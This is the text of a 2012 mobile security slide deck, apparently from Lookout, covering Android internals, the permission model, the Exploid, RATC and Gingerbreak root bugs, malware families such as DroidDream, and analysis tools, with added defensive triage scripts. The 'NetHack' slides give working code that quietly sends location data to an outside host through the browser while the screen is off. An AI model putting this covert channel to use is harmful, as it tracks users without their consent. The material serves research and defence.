Mobile Security Overview
23 April 2012

Agenda
‣ Mobile threat landscape
‣ Security/permissions model & the mythical sandbox
‣ Vulnerabilities
‣ Android platform patch cycle
‣ Mobile malware
‣ Mobile malware analysis tools
Lookout, Inc. Proprietary and Confidential Information
Mobile Threat Landscape
Mobile Threat Surface
Network-based
Application-based
Web-based
Malware Motivations
‣ Toll fraud:
‣ Phones are a wallet of sorts
‣ Premium SMS
‣ Premium rate international dialing
Malware Motivations
‣ Shady distribution:
‣ Bundling package push with popular apps
‣ Ranges from annoying to forced installation
Malware Motivations
‣ Remote control:
‣ Two-factor auth MiTM
‣ Spam (SMS, etc)
‣ Targeted surveillance
App Repackaging
Malvertising
Android Internals
Android Manifest
• AndroidManifest.xml – Every application must have one
• Declares the package name, a unique identifier for every app
• Describes the application's components (Activities, Services, BroadcastReceivers, ContentProviders, etc.)
• Declares the permissions the app requests in order to reach protected APIs (If only there were a way to get around that...)
• Declares the permissions other applications must hold to interact with this application's components
Activity
• A way for users to interact with the application
• Composed of Views:
  • Button
  • TextView
  • ImageView
  • etc...
Activity
• Managed as an Activity stack
• The new/foreground Activity sits on top of the stack, in the running/active state
• Previous Activities sit below it in the paused state
• An Activity is removed from the stack when it finishes
Activity
• An application can start another application's Activity!
• The Activity runs in its own application's process.
• The caller therefore doesn't necessarily get access to the started Activity's data
• The android:permission attribute in the manifest can restrict who may start the Activity.
Intent
• “An abstract description of an operation to be performed”
• Simple IPC for applications
• Intents can be sent with data
Intent
• Can be used to start an Activity with startActivity()
• Intents can be broadcast system-wide with sendBroadcast()
• Communicate with a background Service
• Two main components:
  • Action
  • Data (URI: http:, content:, geo:, etc...)

Intent myIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("http://www.google.com"));
startActivity(myIntent);
Broadcast Receiver
• Receives an Intent
• Can be created dynamically with Context.registerReceiver() or declared in the manifest with the <receiver> tag
• Receives two types of broadcasts:
  • Normal Broadcasts – Asynchronous; cannot be aborted
  • Ordered Broadcasts – Delivered serially; can be aborted, or pass a result on to the next receiver
Broadcast Receiver
• Permissions can be enforced in both directions
• Sender can declare a permission the receiver must hold (the receiverPermission argument to sendBroadcast())
• Receiver can declare a permission the sender must hold (android:permission on the <receiver> element, or the broadcastPermission argument to registerReceiver())
Service
• Component to do work in the background
• NOT a separate process
• NOT a thread
• Kind of like an Activity without a UI
• Can enforce access to service with a required permission
Security/Permission Model
The Mythical Sandbox
The Sandbox
• The VM is not the sandbox
• Unix multi-user (uid/gid) sandbox! Each app is a different uid
• Lightweight VM running for each process
• Breaking out of the VM gains you nothing
• Apps can request to share a uid (both must be signed with the same key)
Permissions
• Default application has no permissions granted
• Finer grained access to content/APIs
  • android.permission.SEND_SMS
  • android.permission.READ_SMS
  • android.permission.CHANGE_WIFI_STATE
  • etc..
• Some permissions are fairly coarse
  • e.g. READ_PHONE_STATE hands over IMEI, IMSI and MSISDN/phone # together
• Declared in AndroidManifest.xml
Why permissions matter
• Permissions gate what an App can do
• Users are required to OK permissions before downloading an App (an install-time, all-or-nothing grant)
• Users can decipher to some degree whether permissions are appropriate
Why permissions matter
(comparison slide: screenshots only)
What does 0 permissions mean?
• No permission screen at all!
• Straight to download
• Why should a user worry about an App Android doesn’t warn about?
Why ask for permission when you can ask for forgiveness?
• Apps or games not requesting INTERNET seem low risk.
• Your sandbox can't access the internet.
• Ask your neighbor!
• Pop open a browser.

NetHack
startActivity(new Intent(Intent.ACTION_VIEW,
        Uri.parse("http://mysite.com/data?lat=" + lat + "&lon=" + lon)));

0 Perm UPLOAD
• Can we do this secretly?
• Obscuring the browser (onPause()) stops the page from loading.

32.175.xxx.xxx - - [03:30:36] "GET /data?lat=123.2&lon=32.2 HTTP/1.1" 404 203

0 Perm UPLOAD
• How about we only pop up browsers when the screen is off?
• Need to close browser when the screen turns on
• Bonus Points: Redirect to http://www.google.com when you’re done (or read browser history from logs)
0 Perm UPLOAD
// Let's send if no one is looking!
// Poll the screen state; only raise the browser while the display is off,
// and push it out of the way (HOME intent) as soon as the screen comes back on.
PowerManager pm = (PowerManager) getSystemService(Context.POWER_SERVICE);
if (!pm.isScreenOn()) {
    Log.e("NetHack", "Screen off");
    startActivity(new Intent(Intent.ACTION_VIEW,
            Uri.parse("http://mysite/data?lat=" + lat + "&lon=" + lon))
            .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK)); // NEW_TASK: we are not in an Activity context
    mBrowserDisplayed = true;
} else if (mBrowserDisplayed) {
    Log.e("NetHack", "Screen on");
    // Bring the launcher to the front so the user never sees the browser page
    startActivity(new Intent(Intent.ACTION_MAIN).addCategory(Intent.CATEGORY_HOME));
    mBrowserDisplayed = false;
}

But what about two way communication?

0 Perm UPLOAD
0 Perm Bidirectional
•Pop browser to page with downloadable content-type (http://mysite.com/data.zip)
•Default Android browser automatically saves it to /sdcard/downloads/data.zip
•But there are some downsides...
•No way to clear notifications
• To clean up the filesystem you need to request WRITE_EXTERNAL_STORAGE
• Automatically requested if you target Android 1.5
0 Perm Bidirectional
•How about a custom URI receiver?
•Google Maps uses geo:latitude,longitude?zoom to automatically launch their App
•We can do the same!
0 Perm Bidirectional
• We can register ourselves for nethack://
• Redirect our page from before to nethack:data?param=server_data
• This has to be an <activity>, not a <receiver> (It is meant for foreground interactions)

<!-- AndroidManifest.xml -->
<activity android:name=".NetHackReceiver">
    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="nethack" android:host="data"/>
    </intent-filter>
</activity>
0 Perm Bidirectional
• Activity is never seen if you call finish() in onCreate()
• Data is available in the Intent
• Bonus Points: New tab for nethack URI and redirect original page to http://google.com

public class NetHackReceiver extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Log.e("NetHack", "URI: " + getIntent().toURI());
        finish(); // So no one ever sees this activity
    }
}

E/NetHack ( 8647): URI: nethack:data?param=MySecret#Intent;action=android.intent.action.VIEW;category=android.intent.category.BROWSABLE;launchFlags=0x400000;component=com.lookout.nethack/.NetHack;end
0 Perm Bidirectional
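A triage script for the pattern described in the last few slides, added here as an example; it is not part of the original deck or of the NetHack demo app. It parses a decoded AndroidManifest.xml and flags an app that requests no permissions at all yet registers a VIEW + BROWSABLE activity on a private URI scheme, which is the inbound half of the zero-permission browser channel. The two manifests inside the block are constructed for the example (the first reproduces the nethack:// receiver from the slide); a real APK carries its manifest as binary XML, so decode it with apktool or aapt first. COMMON_SCHEMES is an assumption about which schemes are too ordinary to be interesting.

```python
"""Flag the zero-permission browser-relay fingerprint in an AndroidManifest.xml.

Added example, not from the original slides. Input is decoded (text) manifest XML.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
# Assumption: schemes the platform already routes for everyone; a private one stands out.
COMMON_SCHEMES = {"http", "https", "file", "content", "geo", "tel", "mailto", "sms", "market"}


def attr(elem, name):
    """Read an android:-namespaced attribute such as android:name."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def requested_permissions(root):
    """All <uses-permission> names, sorted; empty for a zero-permission app."""
    return sorted(attr(p, "name") for p in root.iter("uses-permission") if attr(p, "name"))


def browsable_custom_schemes(root):
    """(activity_name, scheme) for every VIEW + BROWSABLE filter on a non-standard scheme."""
    hits = []
    for activity in root.iter("activity"):
        for flt in activity.findall("intent-filter"):
            actions = {attr(a, "name") for a in flt.findall("action")}
            cats = {attr(c, "name") for c in flt.findall("category")}
            if "android.intent.action.VIEW" not in actions:
                continue
            if "android.intent.category.BROWSABLE" not in cats:
                continue  # the browser only dispatches to BROWSABLE activities
            for data in flt.findall("data"):
                scheme = attr(data, "scheme")
                if scheme and scheme.lower() not in COMMON_SCHEMES:
                    hits.append((attr(activity, "name"), scheme))
    return hits


def triage(manifest_xml):
    """Summarise the indicators; 'suspicious' is zero permissions plus a private inbound scheme."""
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(root)
    schemes = browsable_custom_schemes(root)
    return {
        "package": root.get("package"),
        "permissions": perms,
        "custom_schemes": schemes,
        "suspicious": not perms and bool(schemes),
    }


# Constructed sample 1: the receiver declared on the slide, no <uses-permission> at all.
NETHACK_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.lookout.nethack">
  <application>
    <activity android:name=".NetHackReceiver">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="nethack" android:host="data"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

# Constructed sample 2: an ordinary game that asks for INTERNET and has only a launcher activity.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.game">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name=".Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

if __name__ == "__main__":
    for manifest in (NETHACK_MANIFEST, BENIGN_MANIFEST):
        print(triage(manifest))
```

The check is deliberately narrow: an app that declares INTERNET has no reason to bounce data through the browser, so the zero-permission condition is what makes a private scheme worth a second look.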
Vulnerabilities
System Privilege Escalations
•Software has vulns. We expect this.
•Malware has primarily relied on 3 prominent privilege escalations.
•Slow (or non-existent) patch cycles leave a long tail of impact
•Also, lots of old things are new …
Exploid
• Disclosed: 2010-07-15
• Unchecked origin of uevent messages in init: init's NETLINK_KOBJECT_UEVENT socket did not verify that a message came from the kernel, so any local process could inject one.
• Patch - 2.2: 2010-07-19
RATC/Zimperlich
• Disclosed: 2010-08-21 / 2010-12-30
• Unchecked setuid() return value in adb/zygote: exhaust RLIMIT_NPROC so the call that is supposed to drop root fails, and the process carries on as root.
• Patch - 2.3: 2010-08-27 / 2010-08-30
• Backport - 2.2: 2010-08-30
Gingerbreak/Honeybomb
• Disclosed: 2011-04-21
• vold uevent origin bug + arbitrary-offset 4-byte write: vold also trusted uevent messages without checking the sender, and a missing bounds check on a partition index turned one into a 4-byte write at an attacker-chosen offset.
• Patch - 2.3: 2011-04-18
• Backport - 2.2: 2011-04-26
And many more …
• Many are hardware/OEM-specific
• Many OEM utilities are not coded securely
• Sometimes it feels like reading bugtraq circa 1995
• Vulns are often reserved for rooting devices
• We have yet to see malicious use of a remote exploit, but it will happen
On Lockdown
•Devices ship with firmware locked down
•Motivations: Radio Security, DRM
•This prevents enthusiast modification of the OS image
Jailbreaking
•Enthusiasts are undeterred
•Exploits have generally been published to jailbreak devices
•Unfortunately they’re also used by malware authors
•In many cases vendors are notified, but not always
•Net impact is negative for handset security
App Vulns
• What about user-level applications?
• Entry points (Activities, Receivers, Services, Providers) can expose unsafe behaviors leading to compromised authorization
  • e.g. Process execution on behalf of whoever reaches the exported component
• Again, everything old is new …
  • e.g. Process umask (000 instead of 022 leaves every file the app creates world-writable)
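An added example (not from the slides) that lists the exported entry points a manifest leaves without a permission guard, which is the attack surface the App Vulns slide refers to. It applies the export rule in force at the time of the talk: a component is exported when android:exported="true", or when it declares an intent-filter and does not set exported="false"; a <provider> was exported by default before API level 17. Launcher activities are skipped because they are exported by design. The sample manifest is constructed; its .SmsReceiver entry carries the receiver-side guard from the Broadcast Receiver slide (android:permission on the <receiver>), so it is not reported, while the service and provider are.

```python
"""List exported Android components that no permission guards.

Added example, not from the original slides. Export rule is the pre-API-31 one
(intent-filter implies exported unless android:exported="false"; providers exported
by default before API 17). Input is decoded (text) manifest XML.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")
LAUNCHER = "android.intent.category.LAUNCHER"


def attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def is_exported(component):
    """Explicit android:exported wins; otherwise providers and filtered components are exported."""
    explicit = attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return True  # legacy default for <provider>
    return component.find("intent-filter") is not None


def is_launcher(component):
    """Launcher activities are exported on purpose; leave them out of the findings."""
    for flt in component.findall("intent-filter"):
        if any(attr(c, "name") == LAUNCHER for c in flt.findall("category")):
            return True
    return False


def unguarded_exports(manifest_xml):
    """Return [(tag, name)] for exported, non-launcher components with no permission guard."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    if app is None:
        return []
    app_perm = attr(app, "permission")  # a permission on <application> guards every component
    findings = []
    for tag in COMPONENT_TAGS:
        for comp in app.findall(tag):
            if not is_exported(comp) or is_launcher(comp):
                continue
            guard = attr(comp, "permission") or app_perm
            if comp.tag == "provider":  # providers may guard reads and writes separately
                guard = guard or attr(comp, "readPermission") or attr(comp, "writePermission")
            if not guard:
                findings.append((comp.tag, attr(comp, "name")))
    return findings


# Constructed sample: one guarded receiver, one private activity, two open entry points.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application>
    <activity android:name=".Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".Internal" android:exported="false"/>
    <service android:name=".ExecService">
      <intent-filter><action android:name="com.example.app.RUN"/></intent-filter>
    </service>
    <receiver android:name=".SmsReceiver" android:permission="android.permission.BROADCAST_SMS">
      <intent-filter><action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter>
    </receiver>
    <provider android:name=".Data" android:authorities="com.example.app.data"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for tag, name in unguarded_exports(SAMPLE_MANIFEST):
        print(f"exported without permission: <{tag}> {name}")
```

Every hit is a component any other uid on the device can reach through an Intent; whether that is a vulnerability depends on what the component does with the caller's input, which is the part a manifest cannot tell you.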
Android Platform Patch Cycle
Platform – OSS Libs
• Android devices are complex software systems
• Over 115 OSS libs integrated into AOSP
Platform – Native Code
• Over 60% of code is native
Platform Ecosystem
Compatibility Test Suite (CTS)
‣ Prior to releasing any update the CTS must pass in order for the device to remain Android Compatible
‣ Originally meant to prevent breaking compatibility with 3rd-party apps
‣ Now also carries security tests for vulnerabilities and bad practices
  ‣ Checks for setuid apps, public keys, known vulns, etc.
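The setuid check in the CTS bullet above, as a stand-alone scanner. This is an added example, not CTS code: it walks a mounted or extracted /system tree, lists every regular file carrying the setuid or setgid bit, and subtracts an allowlist of the setuid binaries the image is expected to ship. The same scan finds the su shims that the rooting malware later in the deck leaves behind. make_demo_tree builds a small constructed tree so the block runs offline; the file names in it are chosen for the example, with bin/extend borrowed from the zHash slide.

```python
"""Find setuid/setgid files in a filesystem tree (the check CTS runs against /system).

Added example, not from the original slides or from CTS.
"""
import os
import stat
import tempfile


def setuid_files(root_dir):
    """Sorted (relative_path, octal_mode) for regular files with the setuid or setgid bit.

    Symlinks are not followed and lstat is used, so a link that points outside
    the tree cannot drag the scan elsewhere.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root_dir, followlinks=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entry: skip it rather than abort the scan
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                rel = os.path.relpath(path, root_dir)
                findings.append((rel, oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)


def unexpected_setuid(root_dir, allowlist=()):
    """Setuid/setgid files whose relative path is not on the allowlist of expected ones."""
    allowed = set(allowlist)
    return [(path, mode) for path, mode in setuid_files(root_dir) if path not in allowed]


def make_demo_tree(base=None):
    """Build a tiny constructed stand-in for a /system tree and return its path."""
    base = base or tempfile.mkdtemp(prefix="fake_system_")
    os.makedirs(os.path.join(base, "bin"), exist_ok=True)
    os.makedirs(os.path.join(base, "xbin"), exist_ok=True)
    layout = {
        "bin/ping": 0o4755,     # a setuid binary the image legitimately ships
        "bin/extend": 0o4755,   # the path the zHash slide names for its su shim
        "xbin/busybox": 0o755,  # executable but not setuid
    }
    for rel, mode in layout.items():
        full = os.path.join(base, rel)
        with open(full, "wb") as fh:
            fh.write(b"\x7fELF")  # placeholder bytes, not a real binary
        os.chmod(full, mode)  # a non-root owner may set setuid on their own file
    return base


if __name__ == "__main__":
    tree = make_demo_tree()
    for path, mode in unexpected_setuid(tree, allowlist=["bin/ping"]):
        print(f"unexpected setuid/setgid file: {path} ({mode})")
```

On a real image the allowlist is the set of setuid paths from a known-good build of the same firmware; anything outside it (an extra su, a world-executable shell with the bit set) is what the malware slides that follow describe leaving behind.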
Android Release Family
Good Release Cycle – Google Nexus One
‣Devices have patches rolled out to them consistently
‣Not just major releases – also incremental updates
Bad Release Cycle – Huawei ‘Ascend’
‣Something’s wrong here…
Mobile Malware
DroidDream
• Publicly disclosed March 1st, 2011
• 250k devices affected from the Market
• DroidDreamLight (DDLight) is related but doesn't escalate privs.
• Attempts to use either Exploid or RAtC to root the device, leaves an su shim behind to regain access
• Remounts /system read-write and pushes apks to /system/app
BaseBridge
• Publicly disclosed March 17th, 2011
• Over 10 unique variants detected
• Attempts to use RAtC to root device
• Remounts /system and pushes apks to /system/app
zHash
• Publicly disclosed March 20th, 2011
• 3 unique variants detected
• Attempts to use Exploid to root device, leaves a su shim behind as /system/bin/extend
• Changes secure settings for possible development reasons
Legacy / DroidKungFu / DroidKungFu2
• Publicly disclosed April 4th, 2011
• Attempts to use Exploid and RAtC to root device
• Remounts /system and pushes an apk to /system/app
jSMSHider
• Publicly disclosed June 15th, 2011
• Exploits compromised platform key vulnerability
• Can silently download/install w/o user intervention
RootSmart
• Publicly disclosed February 2012
• Masquerades as settings app
• Downloads and executes Gingerbreak
• Dropper for DroidLive
Page 61
LeNa
• Publicly disclosed October 20, 2011
• Packaged with apps that conceivably need root (VPN, etc)
• Payload is primarily native ARM
• Variant uncovered April 2012 that hides Gingerbreak inside a fully functional JPEG
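The malware slides above name the same few on-device artifacts again and again: /system remounted read-write, APKs pushed into /system/app (Legacy / DroidKungFu, the March 2011 family), and a su shim left behind at /system/bin/extend (zHash). The following is an added triage script, not Lookout's code, that checks a snapshot pulled from a device for exactly those artifacts. The snapshot format, the `DeviceSnapshot` type and all sample paths, package names and mount lines are constructed for this example.

```python
"""Added example (not Lookout's code): post-infection triage for the artifacts
the malware slides describe: /system remounted read-write, APKs dropped into
/system/app that the firmware baseline does not contain, and the su shim that
zHash leaves at /system/bin/extend. Input is a snapshot a responder pulls from
the device (mount table, directory listings); the sample data is constructed."""
from dataclasses import dataclass

# Paths named on the slides; extend with other documented shims as needed.
KNOWN_SU_SHIMS = {"/system/bin/extend"}


@dataclass
class DeviceSnapshot:
    mounts: list                # lines in /proc/mounts format
    system_app_files: list      # basenames found under /system/app
    system_bin_files: list      # basenames found under /system/bin
    baseline_system_apps: set   # APKs the stock firmware ships in /system/app


def system_mounted_rw(mount_lines):
    """True if the /system mount point carries the 'rw' option."""
    for line in mount_lines:
        parts = line.split()
        if len(parts) >= 4 and parts[1] == "/system":
            return "rw" in parts[3].split(",")
    return False


def unexpected_system_apks(snapshot):
    """APKs under /system/app that the firmware baseline does not list."""
    return sorted(f for f in snapshot.system_app_files
                  if f.endswith(".apk") and f not in snapshot.baseline_system_apps)


def su_shims_present(snapshot):
    """Known su shim paths that exist in /system/bin."""
    return sorted(p for p in ("/system/bin/" + f for f in snapshot.system_bin_files)
                  if p in KNOWN_SU_SHIMS)


def triage(snapshot):
    """Human-readable findings; empty when none of the slide artifacts is present."""
    findings = []
    if system_mounted_rw(snapshot.mounts):
        findings.append("/system is mounted read-write")
    for apk in unexpected_system_apks(snapshot):
        findings.append("non-baseline APK in /system/app: " + apk)
    for shim in su_shims_present(snapshot):
        findings.append("known su shim present: " + shim)
    return findings


# Constructed snapshot of an infected device (block devices, file and package
# names are placeholders, not real indicators).
INFECTED = DeviceSnapshot(
    mounts=[
        "/dev/block/mtdblock3 /system yaffs2 rw,relatime 0 0",
        "/dev/block/mtdblock5 /data yaffs2 rw,nosuid,nodev,relatime 0 0",
    ],
    system_app_files=["Browser.apk", "Settings.apk", "com.example.dropped.apk"],
    system_bin_files=["sh", "toolbox", "extend"],
    baseline_system_apps={"Browser.apk", "Settings.apk"},
)

# The same device as the stock firmware would present it.
CLEAN = DeviceSnapshot(
    mounts=["/dev/block/mtdblock3 /system yaffs2 ro,relatime 0 0"],
    system_app_files=["Browser.apk", "Settings.apk"],
    system_bin_files=["sh", "toolbox"],
    baseline_system_apps={"Browser.apk", "Settings.apk"},
)

if __name__ == "__main__":
    for finding in triage(INFECTED):
        print(finding)
```

The baseline set is the important input: a firmware image of the same build gives you the list of APKs that belong in /system/app, and anything else there after a root exploit is worth pulling for analysis.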
Page 62
Mobile Malware Analysis Tools
Page 65
Different ways to tackle the problem
• Looking directly at DEX files
• Converting to an intermediate language
• Converting back to a higher level language (Java)
• Pros and cons for each
Page 66
Looking right at the op codes
• Like looking at a dead listing of ASM
• Some nice templates for viewing (010 Editor)
• Liable to drive you insane
• Opcodes – http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html
• +1 nerd skills
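Looking directly at DEX files (the first option on the "Different ways to tackle the problem" slide, and what this slide means by the raw op-code view) starts with the 0x70-byte header. The following is an added example, not Lookout's code or any tool the slides mention: it parses the header fields per the public DEX format, checks the Adler-32 checksum and SHA-1 signature the header carries, and flags mismatches, which is how a hand-patched or repacked classes.dex whose author forgot to re-hash gives itself away. `build_sample_dex` produces a constructed header-only blob so the script runs offline; it is not a loadable DEX.

```python
"""Added example (not Lookout's code): parse and integrity-check a DEX header.
Field layout and hash coverage follow the public DEX format: checksum is
Adler-32 over everything after itself (offset 12 to EOF), signature is SHA-1
over everything after itself (offset 32 to EOF)."""
import hashlib
import struct
import zlib

DEX_HEADER_SIZE = 0x70          # every DEX header is 112 bytes
ENDIAN_CONSTANT = 0x12345678    # little-endian files carry this endian_tag
HEADER_FIELDS = (
    "file_size", "header_size", "endian_tag", "link_size", "link_off",
    "map_off", "string_ids_size", "string_ids_off", "type_ids_size",
    "type_ids_off", "proto_ids_size", "proto_ids_off", "field_ids_size",
    "field_ids_off", "method_ids_size", "method_ids_off", "class_defs_size",
    "class_defs_off", "data_size", "data_off",
)
FIELDS_FORMAT = "<20I"          # 20 little-endian uint32 after the signature


def parse_dex_header(blob):
    """Return the header fields as a dict; raises ValueError on a non-DEX blob."""
    if len(blob) < DEX_HEADER_SIZE:
        raise ValueError("blob shorter than a DEX header")
    magic = blob[:8]
    if magic[:4] != b"dex\n" or magic[7:8] != b"\x00":
        raise ValueError("bad DEX magic: %r" % magic)
    header = dict(zip(HEADER_FIELDS, struct.unpack_from(FIELDS_FORMAT, blob, 32)))
    header["version"] = magic[4:7].decode("ascii")
    header["checksum"] = struct.unpack_from("<I", blob, 8)[0]
    header["signature"] = blob[12:32].hex()
    return header


def verify_dex_integrity(blob):
    """List header-level inconsistencies; an empty list means the file is
    self-consistent with its own checksum, signature and size fields."""
    header = parse_dex_header(blob)
    problems = []
    if header["checksum"] != (zlib.adler32(blob[12:]) & 0xFFFFFFFF):
        problems.append("adler32 checksum mismatch")
    if header["signature"] != hashlib.sha1(blob[32:]).hexdigest():
        problems.append("sha1 signature mismatch")
    if header["header_size"] != DEX_HEADER_SIZE:
        problems.append("unexpected header_size 0x%x" % header["header_size"])
    if header["endian_tag"] != ENDIAN_CONSTANT:
        problems.append("unexpected endian_tag 0x%x" % header["endian_tag"])
    if header["file_size"] != len(blob):
        problems.append("file_size %d != actual %d" % (header["file_size"], len(blob)))
    return problems


def build_sample_dex(version=b"035"):
    """Constructed sample: a header plus an empty map_list and no classes.
    Enough to exercise the parser offline; not a DEX that Dalvik would load."""
    data = struct.pack("<I", 0)                     # map_list with zero items
    fields = [0] * 20
    fields[0] = DEX_HEADER_SIZE + len(data)         # file_size
    fields[1] = DEX_HEADER_SIZE                     # header_size
    fields[2] = ENDIAN_CONSTANT                     # endian_tag
    fields[5] = DEX_HEADER_SIZE                     # map_off -> our map_list
    fields[18] = len(data)                          # data_size
    fields[19] = DEX_HEADER_SIZE                    # data_off
    body = struct.pack(FIELDS_FORMAT, *fields) + data
    signature = hashlib.sha1(body).digest()
    checksum = zlib.adler32(signature + body) & 0xFFFFFFFF
    return b"dex\n" + version + b"\x00" + struct.pack("<I", checksum) + signature + body


if __name__ == "__main__":
    sample = build_sample_dex()
    print(parse_dex_header(sample))
    print("problems:", verify_dex_integrity(sample))
```

Run it against a real classes.dex pulled out of an APK and the `*_size`/`*_off` pairs tell you where the string, type, method and class tables start, which is the map you need before the 010 Editor template or an opcode table makes any sense.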
Page 68
IDA Pro
• Reading dex at the “assembly level”
• Can also handle ELF ARM executables (native code)
• Most commonly used professional reversing tool
• Easily scriptable / Somewhat easily automated / Allows for SDK plugins
• Looks pretty
Page 70
Decryption Script
Page 71
IDA Pro Pros & Cons
• + Endless uses, easy renaming, very stable
• + Best tool for ELF reversing available
• - Costs a ton (1.5k+)
• - Some functionality not supported for dex files (xref)
• - Hard to share work between reversers
• - Closed source
Page 72
(bak)smali
• Intermediate “jasmin” style language
• Most used tool
• Maintained by JesusFreke, (now) a Google employee
• Open Source ( http://code.google.com/p/smali/ )
• Also recompilation!
Page 74
baksmali Pros
• Easily readable code
• Highlighters available for emacs/vim/notepad++
• Open Source FTW!
• Recompilation
• Easy usage with apktool
• Extra output (debug/variable names)
Page 75
baksmali Cons
• Reading directly disassembled compiler output / can be hard to get used to
• No real IDE integration
• No GUI
Page 76
Dex2jar + ded + others
• Converts dex files to Java class files (translating Dalvik opcodes to Java opcodes)
• Use Java decompilation tools afterwards (jd-gui, jad, etc.)
• Issues arise and are hard to solve, since Dalvik is a register-based VM where register types don't matter, unlike the JVM
Page 78
Dex2jar + ded + others Pros & Cons
• + Leverage Java tools on dalvik based code (iffy sometimes)
• - Prone to issues
• - Going from high level to machine-optimized and back to high level often loses context (hard to re-roll loops perfectly)
Page 79
Wat?
Page 81
Ok – got the tools – now what?
• How do I tell if something is bad?
• How do I tell what it’s doing and how?
Page 82
“Bad” is subjective
• “jailbreak”, “rooting” or “exploit” ?
• Did you tell me you’d root my device? (ex: zHash)
• Did you tell me you’d charge me money?
Page 84
“Bad” is subjective
Are you trying to confuse the user, or are you just bad at UI?
Did you abort the SMS received telling me I am being charged?
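The last question on this slide points at a concrete, checkable behaviour: a premium-SMS app that registers a receiver for SMS_RECEIVED at high priority and calls abortBroadcast() can swallow the carrier's charge notification before the user's messaging app ever sees it. The following is an added static-triage script, not Lookout's code, that surfaces the three ingredients from the artifacts the tools above produce: the manifest (SEND_SMS permission, SMS_RECEIVED receiver priority) and the baksmali listing (abortBroadcast() call). The manifest and smali below are constructed samples; `com.example.sample` and `SmsReceiver` are placeholders, and the priority threshold is a heuristic I chose.

```python
"""Added example (not Lookout's code): static triage for the premium-SMS
behaviour the "Bad is subjective" slide asks about. Flags SEND_SMS in the
manifest, receivers listening for SMS_RECEIVED at high priority, and
abortBroadcast() calls in baksmali output."""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
# matches e.g.  invoke-virtual {p0}, Lcom/foo/Receiver;->abortBroadcast()V
ABORT_CALL = re.compile(r"invoke-\w+\s+\{[^}]*\},\s*L[\w/$]+;->abortBroadcast\(\)V")


def android_attr(elem, name):
    """Read an android:-namespaced attribute from a manifest element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def requested_permissions(manifest_xml):
    root = ET.fromstring(manifest_xml)
    return {android_attr(p, "name") for p in root.iter("uses-permission")}


def sms_receivers(manifest_xml):
    """(receiver name, filter priority) for every receiver listening for SMS_RECEIVED."""
    root = ET.fromstring(manifest_xml)
    found = []
    for receiver in root.iter("receiver"):
        for flt in receiver.findall("intent-filter"):
            actions = {android_attr(a, "name") for a in flt.findall("action")}
            if SMS_RECEIVED in actions:
                prio = android_attr(flt, "priority")
                found.append((android_attr(receiver, "name"), int(prio) if prio else 0))
    return found


def abort_broadcast_calls(smali_text):
    """Every abortBroadcast() invocation found in a smali listing."""
    return ABORT_CALL.findall(smali_text)


def triage_sms_behaviour(manifest_xml, smali_text, high_priority=1000):
    """Findings a reviewer would want to see before deciding 'bad' or 'just bad UI'."""
    findings = []
    if "android.permission.SEND_SMS" in requested_permissions(manifest_xml):
        findings.append("requests SEND_SMS")
    for name, prio in sms_receivers(manifest_xml):
        if prio >= high_priority:
            findings.append("%s handles SMS_RECEIVED at priority %d" % (name, prio))
    if abort_broadcast_calls(smali_text):
        findings.append("calls abortBroadcast()")
    return findings


# Constructed sample manifest (package and class names are placeholders).
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sample">
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <application android:label="Sample">
        <receiver android:name=".SmsReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Constructed baksmali excerpt of that receiver's onReceive().
SAMPLE_SMALI = """\
.method public onReceive(Landroid/content/Context;Landroid/content/Intent;)V
    .locals 0
    invoke-virtual {p0}, Lcom/example/sample/SmsReceiver;->abortBroadcast()V
    return-void
.end method
"""

if __name__ == "__main__":
    for finding in triage_sms_behaviour(SAMPLE_MANIFEST, SAMPLE_SMALI):
        print(finding)
```

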